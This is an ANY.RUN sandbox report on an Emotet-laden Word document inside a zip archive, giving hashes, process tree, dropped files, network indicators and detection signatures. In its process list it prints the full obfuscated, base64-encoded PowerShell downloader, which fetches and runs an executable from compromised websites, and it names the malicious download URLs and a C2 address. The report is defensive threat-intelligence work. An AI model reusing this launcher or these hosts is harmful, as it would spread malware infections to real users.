analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

6bb7ec42dbf482acec45aeb4630aa408.zip

Full analysis: https://app.any.run/tasks/e5697235-5d84-4a90-94ea-d8e34d44edfa
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Malware Trends Tracker     >>>
Analysis date: May 20, 2019, 16:06:20
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
emotet
trojan
emotet-doc
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

2A1CBDA02594CBBF14DC760002B12C67

SHA1:

A7495A5293C55CECF1C33BA4F4CAC6DD5BB328D1

SHA256:

1CD029B4660AC67C357EA2EACE7A491A173154521F890AE51741358299B52963

SSDEEP:

1536:g8ZYO98NbGUJO9SFwBZIm5IjUPLGxHhEBk7BPpTFq8bD5:gqYOsGBgaIQG16GF15

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 704.exe (PID: 3440)
      • 704.exe (PID: 2488)
      • soundser.exe (PID: 3056)
      • soundser.exe (PID: 3680)

    • Downloads executable files from the Internet

      • powershell.exe (PID: 3444)

    • Emotet process was detected

      • soundser.exe (PID: 3056)

    • Changes the autorun value in the registry

      • soundser.exe (PID: 3680)

    • EMOTET was detected

      • soundser.exe (PID: 3680)

    • Connects to CnC server

      • soundser.exe (PID: 3680)

  • SUSPICIOUS

    • Starts Microsoft Office Application

      • rundll32.exe (PID: 2804)

    • Executed via WMI

      • powershell.exe (PID: 3444)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3444)
      • 704.exe (PID: 3440)

    • PowerShell script executed

      • powershell.exe (PID: 3444)

    • Creates files in the user directory

      • powershell.exe (PID: 3444)

    • Starts itself from another location

      • 704.exe (PID: 3440)

  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2756)

    • Manual execution by user

      • rundll32.exe (PID: 2804)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2756)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0009
ZipCompression: Deflated
ZipModifyDate: 2019:05:20 17:54:22
ZipCRC: 0x81565601
ZipCompressedSize: 80099
ZipUncompressedSize: 128768
ZipFileName: 6bb7ec42dbf482acec45aeb4630aa408
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
43
Monitored processes
8
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winrar.exe no specs rundll32.exe no specs winword.exe no specs powershell.exe 704.exe no specs 704.exe #EMOTET soundser.exe no specs #EMOTET soundser.exe

Process information

PID
CMD
Path
Indicators
Parent process
3324"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\6bb7ec42dbf482acec45aeb4630aa408.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
2804"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\admin\Desktop\6bb7ec42dbf482acec45aeb4630aa408C:\Windows\system32\rundll32.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2756"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\6bb7ec42dbf482acec45aeb4630aa408"C:\Program Files\Microsoft Office\Office14\WINWORD.EXErundll32.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3444powershell -ExecutionPolicy bypass -WindowStyle Hidden -noprofile -e JABxADcANABfADkAOAA0ADQAPQAnAHYAMgBfADkAMQAyACcAOwAkAGgANAAwADQAMwA4ADIAMwAgAD0AIAAnADcAMAA0ACcAOwAkAG4AMgAwADIAXwA5AD0AJwBLADAANQAzADAANAAyADUAJwA7ACQARAA0ADgAMwA3ADIAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAGgANAAwADQAMwA4ADIAMwArACcALgBlAHgAZQAnADsAJABIADYAXwBfADQAMAAxADEAPQAnAEUAMwAxAF8AOAAwADcAJwA7ACQAdwA5AF8AXwAxADUAOQA9AC4AKAAnAG4AZQB3AC0AJwArACcAbwAnACsAJwBiAGoAZQBjAHQAJwApACAATgBFAFQALgB3AEUAYgBgAGMAbABpAGAARQBgAE4AdAA7ACQAegA5ADEANgAwADUANgA3AD0AJwBoAHQAdABwADoALwAvAHQAbwBuAGcAZABhAGkAZgBwAHQALgBuAGUAdAAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAGgAeQBsAEsATABkAEoAVwBPAGgALwBAAGgAdAB0AHAAOgAvAC8AZQAtAHMAYQBsAGEAbQBwAHIAbwAuAGMAbwBtAC8AcwBhAHMAbgBlAGsAYQB0AC4AYwBvAG0ALwBhAHcAYwAyADYAMAAxAGIAXwBrAGYAOQA1AHUAbABkAHkANAAtADMANgAvAEAAaAB0AHQAcAA6AC8ALwBmAGkAbAB0AG8ALgBtAGwALwBjAGcAaQAtAGIAaQBuAC8AYQBNAHEAcQB1AEUAcwBRAHcALwBAAGgAdAB0AHAAOgAvAC8AcQBwAGQAaQBnAGkAdABlAGMAaAAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AeABtAHQANgBrAHUANQA5AHAAbABfADgANgBiAHQAOABmAHYALQA3ADMAOQAxADkAOAAwADMALwBAAGgAdAB0AHAAOgAvAC8AbwBtAGUAcwB0AHIAZQBtAGEAcgBjAGUAbgBlAGkAcgBvAC4AYwBvAG0ALgBiAHIALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBjAGcAZQB5AF8AdgBwADgANgA3AHMAMgAzADgALQAxADcALwAnAC4AUwBwAEwAaQBUACgAJwBAACcAKQA7ACQAVgA1ADMANwBfADIANQBfAD0AJwByADkANAA4ADMANwAnADsAZgBvAHIAZQBhAGMAaAAoACQAQgA1ADEANwBfADMAIABpAG4AIAAkAHoAOQAxADYAMAA1ADYANwApAHsAdAByAHkAewAkAHcAOQBfAF8AMQA1ADkALgBkAE8AVwBuAGwAbwBBAEQARgBJAEwARQAoACQAQgA1ADEANwBfADMALAAgACQARAA0ADgAMwA3ADIAKQA7ACQAcgAwADEAMgAwADMAPQAnAHoAMAA1ADcAXwA5ADUAJwA7AEkAZgAgACgAKAAuACgAJwBHACcAKwAnAGUAdAAtACcAKwAnAEkAdABlAG0AJwApACAAJABEADQAOAAzADcAMgApAC4AbABFAE4AZwBUAGgAIAAtAGcAZQAgADIAOAA2ADcANQApACAAewAuACgAJwBJAG4AdgBvACcAKwAnAGsAZQAnACsAJwAtAEkAdABlACcAKwAnAG0AJwApACAAJABEADQAOAAzADcAMgA7ACQAegAwADEAOQAwADAAMQA9ACcAZgA4ADcAMAA1ADcANwAnADsAYgByAGUAYQBrADsAJAB3ADQANgBfADAANAAyADYAPQAnAEUAMQA0AF8AOAA4ADcAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAQwBfADIAMgBfADcAPQAnAFMAXwAxAF8ANQAxADcANgAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2488"C:\Users\admin\704.exe" C:\Users\admin\704.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3440--9447f139C:\Users\admin\704.exe
704.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3056"C:\Users\admin\AppData\Local\soundser\soundser.exe"C:\Users\admin\AppData\Local\soundser\soundser.exe
704.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3680--3ab57678C:\Users\admin\AppData\Local\soundser\soundser.exe
soundser.exe
User:
admin
Integrity Level:
MEDIUM
Total events
2 293
Read events
1 719
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
3
Text files
2
Unknown types
8

Dropped files

PID
Process
Filename
Type
2756WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR4734.tmp.cvr
MD5:
SHA256:
3444powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VQXM4HIQ07TU3MF88DLO.temp
MD5:
SHA256:
3324WinRAR.exeC:\Users\admin\Desktop\6bb7ec42dbf482acec45aeb4630aa408document
MD5:6BB7EC42DBF482ACEC45AEB4630AA408
SHA256:FB50D4BF2260C45EE78C454A3143C1268B9099175FEAF6FEBAEA038DF1040517
2756WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C9137B8C.wmfwmf
MD5:6B780BDE7695A7EFEC4E1FCD216CBE00
SHA256:4F4941DCE9A9A9DA6E8F2326A815284E844FDDA49CF0D96735B26950FDA46F0E
2756WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9E30E1D.wmfwmf
MD5:6FA521F2A2CBACBA0EB9D8C40E4701EB
SHA256:B161E62C80C5411AD3105C6BA78D01FB016323373F569D773E47BF0AAC18B0DC
2756WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\58FC457A.wmfwmf
MD5:5B03185304A89DAFD641EE360D1012D9
SHA256:C83D17ACC14DD6842DF4C7E1BF341DBA202D3BECDD49AB960C8B9029547F1130
2756WINWORD.EXEC:\Users\admin\Desktop\~$b7ec42dbf482acec45aeb4630aa408pgc
MD5:8544F810C76EBCB601827B27193E8583
SHA256:B383EDC22EF685BDC1637F3BFEE2FAC7DA50460E53EF97AEBB8771F61D09A188
2756WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:B21314408901F13406089902BB7BAD01
SHA256:65D345D258FA1DD173CB6B610251916E5DF4A21F15A81B0D84DAB048AB86F6AD
2756WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:6CC3A35C17DEC7FD94E9E1DA25336BFB
SHA256:B268DD006918BD3702DD7A78A01510393AC145A48C656B37B1DAE2E06D0E433A
2756WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7215D9F7.wmfwmf
MD5:2DA88F0FE936F3B12CB340EACF81B8A6
SHA256:9EAB3E3621515F38E42BAA52ACD22C462B7E42D59BBC2693FD4316F2BD5514E1
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3444
powershell.exe
GET
200
203.113.174.46:80
http://tongdaifpt.net/wp-includes/hylKLdJWOh/
VN
executable
74.0 Kb
malicious
3680
soundser.exe
POST
200
74.207.227.96:443
http://74.207.227.96:443/tlb/balloon/ringin/
US
binary
132 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3444
powershell.exe
203.113.174.46:80
tongdaifpt.net
Viettel Corporation
VN
malicious
3680
soundser.exe
74.207.227.96:443
Linode, LLC
US
malicious

DNS requests

Domain
IP
Reputation
tongdaifpt.net
  • 203.113.174.46
malicious

Threats

PID
Process
Class
Message
3680
soundser.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
3680
soundser.exe
Potentially Bad Traffic
ET POLICY HTTP traffic on port 443 (POST)
4 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
6bb7ec42dbf482acec45aeb4630aa408.zip